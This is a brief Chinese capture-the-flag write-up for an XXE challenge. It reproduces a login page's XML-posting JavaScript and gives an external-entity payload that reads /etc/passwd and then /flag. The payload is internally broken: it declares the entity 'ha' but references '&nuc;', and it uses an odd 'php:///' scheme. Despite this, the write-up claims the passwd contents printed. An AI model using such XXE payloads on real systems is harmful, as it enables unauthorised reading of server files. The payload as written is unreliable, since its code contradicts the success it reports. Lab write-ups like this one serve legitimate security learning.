原理
XXE漏洞
解题过程
进入靶场看到了登录界面
万能注入没用,也没有sql提示,那应该不是sql注入
查看页面原代码,发现了登录框的发送源码
function doLogin(){
var username = $("#username").val();
var password = $("#password").val();
if(username == "" || password == ""){
alert("Please enter the username and password!");
return;
}
var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
$.ajax({
type: "POST",
url: "doLogin.php",
contentType: "application/xml;charset=utf-8",
data: data,
dataType: "xml",
anysc: false,
success: function (result) {
var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
if(code == "0"){
$(".msg").text(msg + " login fail!");
}else if(code == "1"){
$(".msg").text(msg + " login success!");
}else{
$(".msg").text("error:" + msg);
}
},
error: function (XMLHttpRequest,textStatus,errorThrown) {
$(".msg").text(errorThrown + ':' + textStatus);
}
});
}
可以看到特殊关键词contType是xml类型,猜测需要用到XXE,而且是通过code来判断是否登录成功,我们先抓一下包
这格式?试试XXE
<?xml version="1.0"?>
<!DOCTYPE test[
<!ENTITY ha SYSTEM "php:///etc/passwd">
]>
<user>
<username>
&nuc;
</username>
<password>
asdas
</password>
</user>
--能正常打印passwd的值
php:///flag 那就再读取根目录下的flag文件拿到flag
参考文章:https://blog.csdn.net/qq_52907838/article/details/118030007
XXE参考文章:https://xz.aliyun.com/t/3357